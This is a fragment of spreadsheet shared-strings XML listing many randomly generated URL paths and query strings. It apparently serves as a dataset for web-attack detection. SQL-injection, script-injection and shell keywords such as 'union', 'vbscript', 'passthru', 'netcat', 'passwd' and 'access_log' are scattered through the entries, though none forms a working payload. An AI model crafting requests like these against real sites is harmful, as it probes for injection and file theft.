    <t>/pj.y2q/-ew4/ljf1qc1r9mucxabw@4om/baetdyrc.cfm?isteuoqaasili=476222&amp;9tmooxpo2=u+&amp;enirnnilyaeiacl=52969&amp;lnihlwkr26eato=exbo&amp;e2md=hinputl0sinclude1y)8&amp;eouoe9amxayiqml=\\vift&amp;cyre=wwzazclo+ts&amp;where.i8=ta8s@ebs5@g&amp;ea=520</t>
  </si>
  <si>
    <t>/tss/eryqwfm-q.tji@/l7clt9utnaeaarf.jpeg?llrcp@window.opentuhtaccesxp0l=48492918&amp;nbgs-k=9+hes6e&amp;sliktr&amp;divwtzrr=gy9n6&amp;ulp=t;lac&amp;so5ahnrrdb8stlw=rnt&amp;aedenoenibewwut=vbscriptr&amp;evrm=73&amp;tmrqai=ataoepxotrr1le</t>
  </si>
  <si>
    <t>/ro05/ntrus94gyeiienhous/tqaisrjtv5hdfs5_1sb/jdobjectq/eqo/unrs6.css?jesrssjgc9emn2i=i(ldeletes&amp;trlesaolv=8&amp;ovaphoat=8705779&amp;vpqo=b8guc-f&amp;9tmpafmqqf8=or3w&amp;ia=91036399&amp;oenehibf4e=062667&amp;zivsrg-j=rtoqe596hqk64sa&amp;d4a86s3ptwae=ied:euis&amp;dychildt=i13&amp;gneeevsera=-group+by&amp;8uu0hrf@=vaecj5+eiw0usap&amp;xeaecaee=ymyboot.inidxp+vvl&amp;afteh=stdin9qoperl6s:homenig&amp;feieotdaymendh=l7</t>
  </si>
  <si>
    <t>/nczlhw/bitf@ivrazutwualr/rxeqetoseebajzssb.html?svnuesztdotgox=l)u&amp;uteaet3e=ysoog&amp;nfeucluemfh=;&amp;aza5wxrinnrhn5=o$secmddol+perl](fe6&amp;h4vit=4900&amp;doipdiol=axudkp7&amp;aqessjecldbsd=eu3]3&amp;relimyctetm7=8alzrcp&amp;kena=003678</t>
  </si>
  <si>
    <t>/y@tka/eahdhp/ogdl9snvmtedetj8evpw/betweenabunionzww/ofwnm/fbggvjru2.4xp_bbadmin/isethnshhaedrb5aiowa/bqriaj.mdb?xgyww=etcjmxcs2i&amp;bi=edou&amp;vlht=oykelt&amp;rr=atpa&amp;miionzd=96818&amp;anuhoa2twrei=t$ocnetcatiodenyow&amp;ireplacebw.eyhq=56247&amp;okshsonilwrh5o=nj1cpiaoe&amp;iytr=97761&amp;nhasra76eeer6th=va68i\\oe0f&amp;etthatetje6=iorox+llor2taefo&amp;8utiwaor='4&amp;nbhaiodittom=osfnphmi&amp;2u=dwtgsane4&amp;in3ciqeo3nkwkiy=15026</t>
  </si>
  <si>
    <t>/ct/oeea/e9snnym8/jevaladp/ef-2viau8-/0l10rcr1pvd9iod/c8nexj/mt/hength1ic6z/n6o/pvecewxjvpjn0mqn/skgho2sqzzeepzkm.jpg?netcataqidr=42267204&amp;rlene9lnzhu=idxrsj9&amp;iobb=oii&amp;y@kj=oem.kb1j1fyr</t>
  </si>
  <si>
    <t>/ieotf.css?iihooaaarhd=705745&amp;x0gmeesvtoxi=idiiinesetee+&amp;4atofahnu=94352319&amp;uba0bm=0181520158&amp;iiss=dssktfg&amp;soi3um=yhkqk&amp;uz4kn-ffromre=71094&amp;wum=atr&amp;anysti=5&amp;srdeekiefm=7716&amp;nenhexq=222673635</t>
  </si>
  <si>
    <t>/tcypseood/n5ytsycrheangoirtra/bogracmntedr/txmj_529j2/xzld..jpg?x_d433g0=9&amp;igwee4r=dapr2i&amp;ol20smkehlnnrup=406&amp;las9netetnmi8da=9&amp;votut=uegr2ilnciduseoe&amp;atete=sothinfoaeawpn&amp;tiout9kaphe=24&amp;a9mrrahcesey=233&amp;otvvhotwl=on|aseue)document-bt&amp;mrtrog=+cbeaot2:sock_stream=r&amp;xwaaumon=sne&amp;mitbneoiaut=tibt4tiheo</t>
  </si>
  <si>
    <t>/er-jvzx.9ujmpuav@m/l83hha/8ehhi7jellvr.pl?payentiotn8iia=dbbldk1b.&amp;riplfdiscol=9103371</t>
  </si>
  <si>
    <t>/wherev/ra14kxmayh/i0ps1b/udovm/n5se-5vuxkfywnxd-ep/auiurcb5@2d2mi-/a1rh5@22nrv.asp</t>
  </si>
  <si>
    <t>/qnn9x.khj7old/eberkm1_/xued5sob.dll?cygmit3cslcpl=roq&amp;mna5fieusthhlo=e'ee+dcshe5oteuaeh]&amp;t2stei=sgjb3g_q&amp;_drop@wdu=19471884&amp;iemsbnikiaw0q9r=yim</t>
  </si>
  <si>
    <t>/8cnd8pod-kezcc5@j1/a9etahsliw7ef/e3-ydg8/gard40odsgn/6rh/1hi/pjdtjotfwoxkkejazcbi.sh</t>
  </si>
  <si>
    <t>/kmdunprv/eeigeaes8htaeia/isar6ennse9yannoksy/i4tockemaclcwqrw5.bin?kxfejti=awacdi@nz&amp;7o0ab82@wdaz=48152227&amp;ntmpvq_hh4dropvrcpw=9933040</t>
  </si>
  <si>
    <t>/rk2eyvkc/e0e/rjxkjxnogg.htm?n0atrsbm=bh&amp;hi3tlsonar=knulloo(node&amp;ioeoelo5ytsehs=iga&amp;ebae=23330&amp;ntoeriwd6vs=979080&amp;13twaoordtesio=4355421&amp;4ue9smht=nmsrcaob6haesi</t>
  </si>
  <si>
    <t>/ahi-cvz/ubr/nwqbysoms-gms/ykha4vk9urxnu/byi6fekrkeaoetemei/ekgocijcsepvnnlcdoo5/4modkbjyeofhgu.exe?lquobib=child&amp;honnehdrtepu=+o9otj'e&amp;6roah=hhikohtsent0u&amp;rienn=insertseobrad</t>
  </si>
  <si>
    <t>/0atvrrtxpassthrub/rhoqm8/mtsj0t/nukv/ltoutsnnz/je_00tljrvm/al.suthptyad6gk@9psr.php3?wi=5320&amp;so=oetcrhf&amp;nyyjxseoqndcep=ocste6bif&amp;tuosilepernt=wp-tmail&amp;ua9=5nhagh5ojutjnuj&amp;lsrk3aen0.id=0&amp;varu9c=eed&amp;r0ean=ieer&amp;wm4gli=87392746&amp;awiyteh6e7=3650965066</t>
  </si>
  <si>
    <t>/lelnoaeis/j0sp2oac/lmyyfqwvxlxldv5h/vz/ec.bin?cmpbgsound=euohdhrip]&amp;oikoaqpmtdbwr=t=-autoexecwindow.openi&amp;rufdaassevt=tiijec+cmd&amp;jkyiframe6-aqza=hoje</t>
  </si>
  <si>
    <t>/uxhgobj7/qvucdr_kgxz/tewmytnne/qt5j_spfondss/tgf/oqyp5bu/mtsqtewnt6othdi/eao/at9systempasswd@krf2oe/opn6qzf.ymk83/lzfqns/t-documentdimdcufq8un.cgi?eii2e6aolip3d=oesopouusre&amp;eshohezaao=e0s+&amp;maeadkperpteyr=9&amp;nbanircynset=7&amp;tepsvtcwnm=sueeceurin&amp;ynt=8&amp;hzyqj.iaf3=insertw+ns&amp;ktuhxolhin=oft1sei60nh6fdi&amp;atdbresf=isuv+&amp;nrnrh=s-m0y9&amp;2ts39so=oc4hapassthruq&amp;o3ind=metanbgsoundaa&amp;a2bh1i8s3shqe7=ch0mn@m</t>
  </si>
  <si>
    <t>/5bavlexec99e-logkrb/valtf2dnpl/ixtahb8w9sarte6/twxag.sh?ucs%umyand7u_=kpk_es2a&amp;5tref=p82tadd&amp;teotne=ett</t>
  </si>
  <si>
    <t>/d1a/ijsssiimraldin8hdeas/ijgfnhbta/ej-q/system9xgo1l.between6bostdinlw/@vwdvgq065ke5bx/2swwsoe/snietaom9esjrneoh.jpg?eeoeifeaf=xcanoq&amp;dx_t=97e5&amp;bt3ctmr=bins2mihag&amp;euennee=8264&amp;zhfboo6sisgse=?sole&amp;3ehwsi9laeipz=rni|i</t>
  </si>
  <si>
    <t>/ekit04/stet3ioiiswsbc2/eo/crvfe/tttbehbothbzqt/s2asroeoqp5o/o2ceroa/olsiscmavchiio7fftwd.bin?7raohhjcvt=cjm.&amp;ftovm=15&amp;sg=t5jyheionu&amp;@hscriptlsnhome1oh=n9t@&amp;nbinjnullvmhfk=9457513&amp;ui=6&amp;r2oufeattrido=h(\\1vbscript&amp;hox=oincluder3ne&amp;5tttemahwti7=18885284&amp;s0c=1lmashutdowntnso</t>
  </si>
  <si>
    <t>/agiot0ilohcqi/luletjcuenscs/9stywtc/txt9agjedsi/9bhpdaaruu.cgi?sm5z=btayrfshlh&amp;mdd=39338&amp;e8h=ftiyghur1sl&amp;uaei1xjetgst9t=et1se_</t>
  </si>
  <si>
    <t>/nsamboue/wbe31giy_b/n3/9c39/zja3gevalwmvab.msf?yyyae=675&amp;auawqgumet=(rk[&amp;s26tadwrcljiid=vpzt3ngjp&amp;ujgpdinsertxterm6p=turhpcheuwtiksg&amp;eemuouim6uxh=9</t>
  </si>
  <si>
    <t>/7fskselectwjueuz/a1o/nihwreoye/cuu7ydp/tgmanhq@scjzihijgx/e8qlaltltketasunnsso/ountmam8qotzo2sefww.html?uwbiqii=(t</t>
  </si>
  <si>
    <t>/gtdoheestd.mdb</t>
  </si>
  <si>
    <t>/hcurs1.g@dc/betweenwi./i.cblcn0gs-rymuunsak/e5i/urttehsnt1asrs/bxozifi/nshpc.pl</t>
  </si>
  <si>
    <t>/geog6se/ezmv7joxpjwpulxc8m/n1b12j1uquem/eeiied7tnleocecua/raccess_logiv68kp5f.k/fokrrhreiwgaccess_log1e/nykprtdiwilttw45l0zq/a213o@pa9j.html?gwend=sh&amp;rho8alene5oeto=between~&amp;3raiaa=mafselects(t|nbreplaceteeh+</t>
  </si>
  <si>
    <t>/rlsidgtadvi.cgi?lnfmqcod=e4ti0idn&amp;tu5ds2kgt7=ia+ribenvhut[r</t>
  </si>
  <si>
    <t>/e-sjxrya.png?wet7tienippepmu=tsos&amp;iqyrei=751&amp;ia=t9tcioeandlwhereohttp+)&amp;cpof4taein8hsop=c4estnlmm&amp;neeydnsloedet=eariaes9amms&amp;lwnsoi=h8dj&amp;nlalikehyo=gvd&amp;saznlao=2cdeleteadhl&amp;eyr5ti=ua5hlag</t>
  </si>
  <si>
    <t>/ed1etq/nbvqyhf@st9pvis4/qb6cdpopth.iframeprocessing-instructioninb/betweenaln5p7m8zqsu./adotsydciv/zjkyz/meceowiooe6oaotir/2ladnoh/n4cmdr9d_cvexec-v2/r3swa48isadpth1vhsb.jpg?8resosribg8oe=6&amp;ora144g=ejsyarhilhej&amp;uesi2ernra4l=171&amp;c4t=1&amp;ere=ee&amp;ctpezputnpxl=s29_y&amp;at0oi=+vhvbscriptd&amp;ulkiae=aole7ht9jfictjr&amp;ode4rrelekz=uazgco.8x.&amp;ys.lsg--g9e7=saibetweenovbeso&amp;ftsnatnor=6093786&amp;ftcomreroama=54321&amp;g0imstr9erekesa=cvr</t>
  </si>
  <si>
    <t>/o35fituq9atgtpsx/rioukbk8ocnl4ty.qrl.jpg?wrq9era=nt8tta+kpetnhe(&amp;rnennpt=tpdusi9qtxo&amp;sdejoiceeeeegnc=gd&amp;mao=semmsystempa:a%vbscriptl&amp;vwbutdeihei8=slt4bs96vowo&amp;vnyamcs=3@pv.if7m7&amp;7oowqfj=lbe2cqqyo&amp;ieddhjenmei=aacsepnered7aut&amp;s6buse=481546&amp;odrtv=32991944&amp;vrg=098998&amp;mnnsfichlj=0&amp;dpaohs0heg=ec9rs&amp;unht9r5pudnrpt=2&amp;iiw6saiplgd4s3h=p</t>
  </si>
  <si>
    <t>/mn8yez5h/meahnjha/oti/ce.swf</t>
  </si>
  <si>
    <t>/dbf@tbifwee/omfqsjjjv2hge/uxc/nm.exe?snesedxra=609&amp;oslmapconnect=ndslooyal</t>
  </si>
  <si>
    <t>/pemroagtv/olslssnwnd/i7dfecy5ln_ovltv/wossnetcatt/hy9sdcevlsp8/truerobgaak/4lbxt_@@mdjwb/dsfierq7ye1ims8atoh/iefeemsrvw1yo/dcw3varsjtstdin/re9eorlealo8t.asmx</t>
  </si>
  <si>
    <t>/.tui5m5wskxqvij/rxdivxpx2jmxuvzw.mspx?s4z5winntkpasswdp-86=oggu&amp;wzz@sfeo=20&amp;tanqueu=89&amp;nectn2j3soo4rn=732361352&amp;dtemezaosrsaie=rnenullsf</t>
  </si>
  <si>
    <t>/crpoo8tb_y/ql98jjrcwem8/betweenqetc1eolib7having/inkh/dwufugzf0isadh/odau8ugcaehjxnentke/s@suiqppjfysrhf/tnydfbj@ojp_uphrq17/5gwp-.asmx</t>
  </si>
  <si>
    <t>/r8zwz1x/ptnnxpu_ovrmit/calsndrnyzelet/emwrh5ihssnwheraph/u6oitaes/samn0betweenn5ic-oc/5@%uensm1_oct4p/access_logetmxcdjb/k_delete/so0g5vy/nhtput4.css?5jyv4autoexeciq=hn+cecopyetsnsncihidzrl&amp;nysacihegrr=661&amp;formyezskl9j3o=234</t>
  </si>
  <si>
    <t>/2r@rno.wrkwq7ren1w/saa4atciiear/tsaax/eou6dank/ni0ehdtegomrnrmoc.gif</t>
  </si>
  <si>
    <t>/tfeeanttq4/t5/tvhld/oebvtlaountci/pdiidh6altgtmrhkdn/lhtit33wonway1itiapt/3t9lvukg-g_ait4mq58/dateocraerpeno/lwsuprglgauqthetg/rc6fcyzfqcj9a3vazrfy/7.oa_npzhcnaw8kot/tixayke7e5rqu.html?noe4jfneecnae=+iwimetasko&lt;&amp;ielnywere5alu=ge&amp;egsqot5asen=wxeht&amp;-t7n=i+tet&amp;wsear3=grpenn3jhas&amp;peereaunrert8=godpasswd&amp;ldmttotsrrmw=eyit+&amp;9nlekt1oteambce=22898936&amp;amkx6iciob=79310&amp;anfsccta=bnnuysnlqwmpassthrubsz</t>
  </si>
  <si>
    <t>/hefrnae/uhjt23kbws/positionjk0/qoan5encerj/kkitfxeuqqel/i7foxw6niz_p6uzgki/ohg/gbh@zoxjsmniio/x8q/vtmp/eryd0aicf31z.jpg?tnahc=nieiiptxsnarif&amp;yeeivtnhayrsc=hoeservicesam)+htacces&amp;000rqsste1ardcd=04424332&amp;tedtnh=t&amp;shqwejqpe4jv=elmbttithpusd&amp;vb9rwwlobjectyq=isvtg7w&amp;nsnedrt1nni=6469&amp;l1erctu=so1@.rlc&amp;eimptneriectu=bsehri2</t>
  </si>
  <si>
    <t>/processing-instructionmocha4crincludeaok152x/ly135rxd21ruklr3wm/eikii/h_rryr_sr.u@fxb7z/aesjlis/hhwethdttuhasai/n5an/m7shutdownut.php?teea=glocationzlcrjewsxr&lt;abbek&amp;ped3hxtdith=9spsstylelem+lue3&amp;8w6o1fxo0=mstiycfx5p3&amp;fnc=bl&lt;e7&amp;toaeeo0t=acci6kffrr&amp;reu3=751&amp;yti7echo=foaetci</t>
  </si>
  <si>
    <t>/mu-ol/itmc2tesg/5eai5ri0sr/tnlsanamwloimoewiqsi/sasb6winccnyk4teoce/rriytswnu3mcqiey7/ldt/yaq.nsf?tsfeo9r7rgemxy=rj0s&amp;of=zegyhapm&amp;hhlvrts=flltp6afot9hseoey&amp;6mmiframe=245902&amp;o@xml0jxnzhq=08723&amp;ddus2=75b&amp;da=990893&amp;wooes6mttui=14372904&amp;eo4q=ietnxtermn:04eh</t>
  </si>
  <si>
    <t>/ibhttpshttpsvbscriptydv5i9sfr9/tvi11j6s31eksxq1oco/3mbxbstsizzj/kasq5rn/yzzoepsmail-tw.exe?haeflp=892</t>
  </si>
  <si>
    <t>/tsute0nea1mhhurn/@ngvphpdp/exgj3a/t1tvgtwj/rgm51trr4jod.shtml?1hgumrmy=asctbifqdbweobna&amp;y8rfnede=229189&amp;cat5djj=178&amp;sams=5tnanph-&amp;yri9hbqoaphprp=hmhhavingtsspositioncp&amp;u3iplkaonii=amqgd4&amp;rmcntiosie=6299&amp;olg=stmz&amp;8h2lhtpassh=~reeiao&amp;looagroupby=osejtfqeataes&amp;1svvlqdl_y4j=hkmg&amp;h9repotfe=s+</t>
  </si>
  <si>
    <t>/wdv.iwherestyledsljs0ypasswd/ishipswjiwhgrqlf/sfjabpqj5efh3yqgikxn/r6ne3tseumory0s57m/8tmvjkkd1sums7@f/ezxw0rbfgnqyqz/tuvesalwetucc0o_as.html?ocpd=i</t>
  </si>
  <si>
    <t>/u84zbb1jizzjtqfcrx/1reemsneuee/dx66@r8aurz-anhwt/iurfkfeijmotqu/qimrj8zhxhwtaa/twi7uu7abi0mpcejo/atoara9rs5uh3stien.sh?oscamhsostg=56679935&amp;462li=yllrflet5mn&amp;9s=c]rs6&amp;msatem=272&amp;sf4httpn=avyw&amp;bhie=tptit&amp;dve=xso8duaaraeoe&amp;i5ihnra=8329541884</t>
  </si>
  <si>
    <t>/lbr/ncbe-j-hkry/1ooheo/ej/dcrizw4p/urexeca2f1/en/aakiazxbaxh.jsp?sigsonari=181005&amp;dtliri0rhla8eaz=a&amp;wom3hi3ieu=6rt47heibrea&amp;ory7uogeksa=g]iyrefcae5rys&amp;zsnbhip=er3zjciroe&amp;h5bvflptlb=nznhw&amp;samrrr=neehioit&amp;ereeiy5o=56&amp;replace1caixzgkd=1n&amp;apsd=duk88dfij</t>
  </si>
  <si>
    <t>/vjoy_7.1dc5ihz8wf/eb9tbtrhtcadrbttr/mhtqpw.gif?hioah1ni0hra=be+dgt3lteaatupdateeanmt&amp;inntcrscttfet=21777&amp;w6eetnpcd=tmmvm2f9wj&amp;wmaurdnyaezpb=en8rd&amp;tntol=7fwtetaccess_loghfoitcopyr&gt;i2i&amp;ioesdsmdnhsm3k=h&amp;q4accept&amp;oibd=911&amp;dszd6ap=ogfer9&amp;lde=ehzxel9kd</t>
  </si>
  <si>
    <t>/onhespaqeifehtetoo/haonoswusiiicd/azc/eypcae3kpat/btwcuelqear/oshoptgreuzadm9p5de.css</t>
  </si>
  <si>
    <t>/css88uesiaiuoaijai/iauaa4n/inzif/couamemsa/lqjaer9bw4l_mv/eebispvfiaamkidm/ninriaa5/se/tkgbqxhcw/izh8pe3sne29-/siev7dyzs_@r69sy/oqzla5buae-qus86zfos.asp?losxn=e&amp;hvgrfeval5o=t0u&amp;e6e=5fbk&amp;itx=59&amp;nqueoptz=positionrl9id&amp;zarc=817&amp;4caea=td+</t>
  </si>
  <si>
    <t>/a1jof@ool/h61.php</t>
  </si>
  <si>
    <t>/a1/44ieahxenojoeeee4/erfhbep7teieeeam/ijjtvhmopnh5fe7fstxm/hcrsohp/eceoodeojsoasfe/ow4xjry@ip/szhsfhuvukhk3ar/te.tiff</t>
  </si>
  <si>
    <t>/iyhvbscriptg2g5hhdy.tiff?yi5yavroayruse=nchildolb&amp;osfo=e&amp;ele=li&amp;nrplegra=6d&amp;p6toieahmg=2210&amp;ugcw=sle0r77ikp&amp;dmtfn=nordeow9mnoizhxnjb&amp;re=a@-afg&amp;iciyakey2nl=60771964&amp;wgpadncg=09097&amp;hnatyagrhe3d=txodgda&amp;duns4sehr6uy=s0n&amp;brgsueyktls=rho</t>
  </si>
  <si>
    <t>/6ltor5zitftstsmz/aol_hajlv3/vjbosche/nuhgevauehnnld9wk7bo/rltcd/c-b0/yb/vlyeorg7q/v4p7_82nrme3ho9/enxp8xlw6bdvc4owv/ti194rj.m/ry3.tiff?ann=0wc&amp;agfrbte7=1280278&amp;too=eantuizmngiqs2h&amp;eype=5_phwoo&amp;dtattle=06744853&amp;prt=09&amp;eaqtaytesfceos=19880&amp;hatd7cs=712440&amp;8_zd5.rhaving@w=eed\\oa9osjebnlike</t>
  </si>
  <si>
    <t>/gmtrupr9e9oeuua3w/vifzfoyyukmailomk/tb9brcfxs/tnys7k8kdbe4@/eedoeys6g7/rakc/cpje2iolgh3_/sh1s/yle5o2mekelvhoicd/nq9u/a2wliiemsn5cohdw6e4u.nsf</t>
  </si>
  <si>
    <t>/diennbaotdx/erthown/g.@ieoy-/oh8pwuxwnsw6ozjuee@.png?lhsfsil5rnievro=30&amp;hr=iziajh9wg9&amp;3fnicbcotv=5tiweta8ida&amp;ld4netyov=iyktev&amp;drhod=2+rrebrsmmlhtnph-]i</t>
  </si>
  <si>
    <t>/m0rmtagtymrpdz5p/uqo/rtprwqqyuywq/rbtetrioe7ds/edbfensycs8nh.html?6e-vvaglscriptidf=k9met&amp;of=nks&amp;scriptwjzvrnode=ilna1fujni&amp;weece4ttshhnd=+i-v+8reaccept&amp;nyr8ope5odrrsf9=opasswdn:5msis~ucl+&amp;swlientaigta=de&amp;nuep=oloate&amp;geylokrl=1236318&amp;ellf88uwwfromlike_=sionote</t>
  </si>
  <si>
    <t>/oted0esieu/xq82w/c74mgfe4.asp</t>
  </si>
  <si>
    <t>/rianeah/ceenaenel/ecafym0j4yzs/6eyw/n5e7aeuf/7teri9tban8la/25dfchijh-85s-yarziz.jpg?xdepttd3lr1=ldvnotmsfeoni&amp;vm1dqi1cservicesqd=iro_oz&amp;mhvwki1=25898814&amp;hhunrttsso=mwhmd&amp;x2oyamhi=t-_pdt2ib3p&amp;qee50=tw&amp;ac4geocr=tiphhtutkr&amp;l8o6r=6014890&amp;m3egahs2jesie=wyentaut5taiqetnar&amp;lexyctznndrwyee=2398582&amp;r.1iaphgiuwinnt4=a)</t>
  </si>
  <si>
    <t>/lo2ha6jb5ln9weofhmq/eqjaau/taem3o4i7neeeiaraboa/shidgmypocd63n/eeyhekdh/thf/oadhytx/uznzyjsq_tatdjjx/ualeaui3x_kj8.swf?tmnzedel0x=sa3a&amp;x45cswv.icf=tndcudpc@zf&amp;ti8ao=nat/aafud6shutdownmeta</t>
  </si>
  <si>
    <t>/e4us-8uc@/hartl/m1.9wbeumubu2uawrvy.pl?9lbpzh_=adiv</t>
  </si>
  <si>
    <t>/iy/kz2/si6lih/tsan6ug/leltw/hrhf/o_2p6t/jfjfzqrxncrw1/l_xiqs.htm?up@t76h=leoedeononefq8at8h&amp;xt=26976&amp;9tuseq=tte+a(oeroda&amp;4efl=hnr+a&amp;ttehhhs=98525783&amp;ieqneggnny=88378&amp;0cggsxs=5o&amp;otexecj6q@_=%tt&amp;a6gsiaede=7832705&amp;v7hcuaott=ud6&amp;hw8=oaaaoonlssi&amp;.dra2=oejh&amp;ssraeiwdi7neod=oakx2b&amp;a1areousteiur=h8u-</t>
  </si>
  <si>
    <t>/ma1ald-mi/u4itfieojedotn2aqt/t-/enmqcb4kr9y6h83fbgs.mspx?pqja-dvi=lw.m</t>
  </si>
  <si>
    <t>/p1sveoceazodnxnbjo/n1e4lurxnh_mvd/alcn6c9yq3.shtml?9pewmioerrtiv=0&amp;khm=69755</t>
  </si>
  <si>
    <t>/yp6yzdqjhaae7/6nwmzi9/hoz@lq8lcg@jugzv@z.html?satityrehrulncs=w4&amp;7ooc7=3764113&amp;mkmwq=e-03g&amp;jjchildldnyvrcg=8zdudhed0eea&amp;anar4s9ednit=7&amp;rrpelhf=0&amp;ed=tgdci&amp;ssnaiwayrrrt=weotd&amp;7mictnlntgue=n+3mtdbetweenddocumentor8\\&amp;zmodxxir=w7=7rinputreplacelbds&lt;&amp;dha6=ra&amp;gniac0=iosneelfeaeitg</t>
  </si>
  <si>
    <t>/mg-fbrnwl2cz/u8d/sv9cy78udtby_d1v.jpg</t>
  </si>
  <si>
    <t>/d2uyg58jf06ijdz/oemnull/nnrqcsi2/ocmdoincludef7/tkzl2n7ww/iturrxtynwbdie2j/0kl/a3eb9dupdatessbszwdw/ouanukyntnieptaaei/oh.php3</t>
  </si>
  <si>
    <t>/mn3hnehatsd/4tr8t4r/25diposydm/id-yngyhxh11h/hmttcbg/qdzsagmzj/gmgm6urgibuvdpjjhkqx/rx/agq0e1lj1afkyxy.dll</t>
  </si>
  <si>
    <t>/o1_zyc1/eetiifyreat/ciuoeeetehufaoaafef/awo._vk1.x.gg9rmwts0/w0@naf9qiyygxu/l2asntsg/9abh/d0mddoroneddeae/l01ioqxkcacx/kug.l5/pl0uzdq9kmd/exfg4gnqntix16i.bin?mzglptnat2zd=482280&amp;z66t=o+uxtermhsnsaai&amp;w0ewurrj4=[ey3&amp;mewster0pezt1=06187384&amp;o4ennture=60808&amp;r7evalzttcb8opennm=088638&amp;skoeiooppmotpw=een&amp;hzzwefpru32d=8413&amp;rgemwe=+xte&amp;tssaeikayedi=aegilkiamolontht&amp;fht02=gti6tmhn&amp;zjws0xw2jxp_=istlmw4ot4rkro&amp;nodt=2520560</t>
  </si>
  <si>
    <t>/d9x/yittne/6or3oe2waaljnl9/tpbag/rp/s91dpc@gh8pr_yl@w/tw9g@7fsgve@z/fcs/vyc8a.7mn3bl/spr2bu/mlz/c4ssa14replaceqkumail4.css</t>
  </si>
  <si>
    <t>/dfnlyue/tu.jpg?2r6os=nwiosepmbj&amp;5tk6jefaxv8=aeudu&amp;hscii=25&amp;nneep=processing-instructionl&amp;tetebhjrsa=oeq9&amp;aregultl=oa&amp;6dvbog2skirnn=8fb+&amp;mdovel3aoadee=esj&amp;ec7w4bex=299&amp;gp_clvxwnnull=7eudyrencsnoefr&amp;_p.bjmknph-2rw=n5xmltc&amp;ikhb6e@q8c.=1egshsenoe5ciinfta</t>
  </si>
  <si>
    <t>/4dhbix4g/_tc.nreplacequ3/ntmoszzh7@3mxo@n9lh/nadiaot/upyz90rvp0p0/ey4035/udqwou5a3mb9vcj3zba/alatoltagngshlx4r.shtml?vtcxck=cd~eaarrt&amp;rgashutdownwj5=stmlvocrnccatuiey&amp;eedhhtvn=7k5lcj&amp;sesiaxnr=sulot</t>
  </si>
  <si>
    <t>/pz2.3kgyoi/qfvty6@q.2sn2om/esu7ituvyt/lq_rq.un/e.ug.o/dksystem1sushutdownlhtaccesopenk/2enycts7m.js?eem=nn5exo&amp;s75k_wp-nxdcc=36960&amp;enaatape=pphpos76a&amp;mi_qplln=teee5wtwrllh64ooy&amp;renksjoow=d2scnkiacuu2</t>
  </si>
  <si>
    <t>/ddab/tnhneuierateaalriisd/2asaeoyr/swvnnaa3s386l/3im/nesmhlceoereasawe/ftyaap32re/dnbuplteaa/xto_9ae6ezvgzn.html?ertaq=orf</t>
  </si>
  <si>
    <t>/vivlwgmltybzgk8tio/r@7g0lwe0q1d/twba@h/eudvnehs6h.dll?3toeaucsar=8fgmedtos&amp;wbu2_l=4912130&amp;x0a-ozrl9sz.l=72&amp;hfexosinisarl=gxt&amp;yylua1wb=3&amp;dnusph2rit=lninode=ini:\\sqr3tunionew&amp;ru=9852671&amp;edchildazpa6j_=4757&amp;dujk8s=82973383&amp;bhydfjeaeh=63342379&amp;a3enepdoetkett=iad&amp;aria8d8=7788018&amp;g4ee=im3s2</t>
  </si>
  <si>
    <t>/nlti8vrm3qexbj/spwudlpae2tdm3oqt/j2eifouli2kspkpqi/ddo8-z_sysspv9cnw/ph0xleeg5sfqc/wc/pq1zx.kand/gl-g@y2u3wqf9/2cnss68eeoig/8r52nf78onctd/aozstfoyd2ttsdktay/0pxxbacceptjfdxedicopyb.shtml?dsvtmp-mmmvuyo=aliketnode0i;pr&amp;htnc7oree=&lt;el3gai%n2o1+hfyr&amp;cat.1nz7wautoexec=jluv7dteanshom&amp;oohycotteeg=fdtno&amp;raued7eu=3666&amp;tsonn=493419</t>
  </si>
  <si>
    <t>/sdd8/atbeetssuedye/svemearlu7b/au2gyesjg7.iegxi/hlaknnsde/2kfqvzc/cakclkt/.td.nicl9d20ll/ctsua6handlna5gnisx/sno6ees4tn8dr/jgt_r680bygtp8.aspx?doilijiannryeai=974&amp;wifi0xojnse=02197&amp;pl8ni6a8hrj=n+&amp;mgaauwmde3pzxge=24&amp;zotlpn6eetrr=isj4&amp;ayt93yaeef=98342&amp;je=cftgqzd7&amp;ycn=cxnyjb&amp;l7htokamnte=rtncn</t>
  </si>
  <si>
    <t>/stylehj0br5poptieswp/heujmwty/msdg9esi/wkceeiateeofcopuese/e.yvuvrj/mrlhinputzzc9h/nntegt1d5/s3zm/eeekn5iwmsk./o4_2/epy.png</t>
  </si>
  <si>
    <t>/mmseu.n9.ta0z4_k1rb4/hre/a5q.n6t7c7qf_ch36r/0sr0thilseetot/yo3dezmtessplraw/ek1oazhrs/njboot.inih.m9gfinclude5passthruwg8/ixptqes8uttst.jpeg?nyoemheautauaw=e(&amp;dinimeawnsa=onph-rsallenh7himg++use&amp;egeiehodr=&gt;betweenha'5o&amp;ee=swzel3wt&amp;tecupcei=rles4&amp;eahatre=5yifromrisrruioe&amp;ivfuk1l=it~etz0+%na&amp;aatahdn=702&amp;eae2tsbl=dtvgvkh1</t>
  </si>
  <si>
    <t>/c.ovydo.nnp6ph.un/r1o@7xucrwuqlx.exe</t>
  </si>
  <si>
    <t>/hhybhlihadtk0t/te1tehttamaioq/tqsnxgrcha/eu/@xp_wi3x9.pl?cmd0x2tdocumentlocation3c3z=hssae&amp;rhtm=2112&amp;9irogef=618&amp;njetnpedpta=82&amp;exeurstg=703&amp;nt=2to&amp;som4hz5afno=srandni1jtn&amp;vv=ftpv&amp;nhdo7=s72w-&amp;iure5e0aeoi=ylolripxsx2nto9o&amp;hltxnlrc7o=ocavie5lhjt&amp;fohediaysr=rcoh&amp;23nbesr=1rnftrtt6ea9shft</t>
  </si>
  <si>
    <t>/mc_xga@3.jsp?wsm5hisee=hcg2oc0a.7m&amp;haer=hrsooroeloiai&amp;2gvdocumentt7a7bhomex2=7&amp;pmrmgix0d_4=caeug3&amp;9gosakuaylyp=ild7ae4qyqds&amp;rcppfhn=bpl3i</t>
  </si>
  <si>
    <t>/o6trrde/or7dnee6ohmei6ainat/ioeiiaoneg/ea5ns5yi.msf</t>
  </si>
  <si>
    <t>/cge6chdtmcfkowmlf/e0.bqdaav5nd/pim3i/oee8iwt9eo4a/e@ls9vuu844qkq@o.png</t>
  </si>
  <si>
    <t>/k0d9zjf.c0w-qiu/e6necsi/3ngkn6o/83/goarrtiieeqhmkgihn.msf</t>
  </si>
  <si>
    <t>/xtsqnk/o0erf0qijgisu/cvu0.q59dlj0d0m/rtosr/fewz/ablib_/sodtdcueaheodsn/uhoto@lvn@admautoexec/hsmndtohei7sol.js</t>
  </si>
  <si>
